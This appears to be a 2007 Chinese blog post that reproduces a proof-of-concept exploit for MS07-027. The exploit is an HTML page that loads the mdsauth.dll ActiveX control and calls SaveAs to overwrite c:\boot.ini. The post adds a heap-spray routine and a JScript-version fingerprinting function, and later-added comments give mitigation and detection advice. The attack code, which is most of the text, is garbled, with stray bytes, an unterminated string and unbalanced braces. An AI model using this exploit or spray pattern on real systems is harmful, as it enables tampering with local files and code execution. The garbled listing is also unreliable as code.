
完整的MS07-027

 

CODE:

<html>

<!--
  Reviewer notes (defensive reading of this proof-of-concept):
  - The OBJECT tag below instantiates an ActiveX control by CLSID; the page
    title attributes it to mdsauth.dll (the NMSA Session Description Object).
  - The VBScript fills the session's string properties with attacker-chosen
    text and then calls SaveAs with an absolute local path. That is the
    "arbitrary file modification" named in the title: the control presumably
    writes the session data to whatever path the script supplies, so any
    page that can instantiate it can overwrite local files.
  - Mitigation: apply the MS07-027 update. A vulnerable ActiveX control of
    this kind is normally neutralised by setting its kill bit so Internet
    Explorer will no longer instantiate it from web content.
  - Detection: an OBJECT tag carrying this CLSID, or script invoking SaveAs
    on it with a local path, inside web pages or HTML e-mail is a strong
    indicator of exploitation attempts for this bug.
  - The listing is garbled as extracted: "//" is not a VBScript comment
    marker, the SessionURL string literal is unterminated, and a second
    <script> tag appears inside the VBScript block.
-->

<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>

 

<body>

<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">

</OBJECT>

<script language="vbscript">

//next script is converted to UTF16

target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"

target.SessionAuthor="Andres Tarasco Acuna"

target.SessionEmailContact="atarasco_at_gmail.com"

target.SessionURL="http://XXXXXXXXXXXXX

target.SaveAs "c:\boot.ini"

target.SaveAs "c:\boot.ini"

<script src="inject.js"></script>

</script> [1]%G'J

</body>

</html>

以下是部分shellcode

 

 

===========///ms07-027 exploit ///================

// Heap-spray preparation routine as reproduced on the page.
//
// What it does (as far as the listing shows): it builds many large strings,
// each made of a slide of 0x9090 words followed by the payload, so that a
// hijacked pointer pointing at heapSprayToAddress has a good chance of
// landing inside sprayed memory. HeapRepairCode and Shellcode are referenced
// but not defined anywhere on this page.
//
// Defender's view: this is the classic 2000s browser heap-spray shape.
// Signals worth alerting on in script content are unescape("%u9090...")
// constants, a string doubled in a loop until it reaches multi-megabyte
// size, and an array filled with copies of that string in a loop. Script
// emulation in AV/IDS products and browser mitigations (DEP/ASLR, heap
// isolation) target exactly this pattern.
//
// NOTE(review): the listing is garbled as extracted (stray bytes on the
// lines after the header); it is not a runnable listing as shown.
function PrepMem()

//Standard Heap Spray Code +e

?bmE 

// Address the spray is meant to cover; 0x06060606 is a typical "land in the
// slide" value for this era of exploit.
var heapSprayToAddress = 0x06060606;

3RC!Cv5hU 

    // Payload = repair stub + shellcode (neither is shown on this page).
    var payLoadCode = HeapRepairCode + Shellcode;

    // Size of each sprayed block in bytes (4 MiB).
    var heapBlockSize = 0x400000;

 

 

    // JS strings are UTF-16, so the byte size is twice the length.
    var payLoadSize = payLoadCode.length * 2;

    // Slide fills the rest of the block; 0x38 presumably accounts for string
    // object/heap header overhead - not derivable from this page.
    var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

 

    // Two 0x9090 words - a NOP-like slide seed.
    var spraySlide = unescape("%u9090%u9090");

 

 

    // Grow the seed to the block's slide size.
    spraySlide = getSpraySlide(spraySlide,spraySlideSize);

 

 

    // Number of blocks needed to reach the target address.
    heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

    memory = new Array();

    for (i=0;i<heapBlocks;i++)

 

 

    {

        memory = spraySlide + payLoadCode;

 

 

    }

 

    // Doubles the slide until it is at least spraySlideSize bytes, then
    // trims it to exactly spraySlideSize/2 UTF-16 units.
    function getSpraySlide(spraySlide, spraySlideSize)

 

    {

        while (spraySlide.length*2<spraySlideSize)

 

 

        {

 

 

            spraySlide += spraySlide;

        }

 

        spraySlide = spraySlide.substring(0,spraySlideSize/2);

        return spraySlide;

    }

}

 

 

 

 

// Fingerprints the host by concatenating the JScript engine's major, minor
// and build numbers (ScriptEngine*Version() are IE/JScript globals) and
// bucketing the result into "preSP2", "SP2" or 0.
//
// Defender's view: script that reads the scripting-engine version before
// choosing a code path is a common exploit-kit tell and is worth flagging
// on its own, independent of any payload.
//
// NOTE(review): the braces in the if/else chain are unbalanced as extracted;
// the listing does not parse as shown.
function GetSystemVersion()

 

 

{

//Simple Detecting of OS version out of Jscript version:

 

        // ver is built as a string, e.g. major + minor + build digits.
        var ver = "";

 

 

        ver += ScriptEngineMajorVersion();

 

        ver += ScriptEngineMinorVersion();

 

        ver += ScriptEngineBuildVersion();

 

        // The numeric comparisons coerce the string to a number; the
        // thresholds presumably encode specific JScript builds (5.6.xxxx) -
        // not verifiable from this page.
        if    ( ver<568820 ){ return("preSP2");

        else if ( ver<575730 ){ return("SP2");

        else return (0);

 

}

 

分类:零度共享| 发布:赵克| 查看: | 发表时间:2007/5/13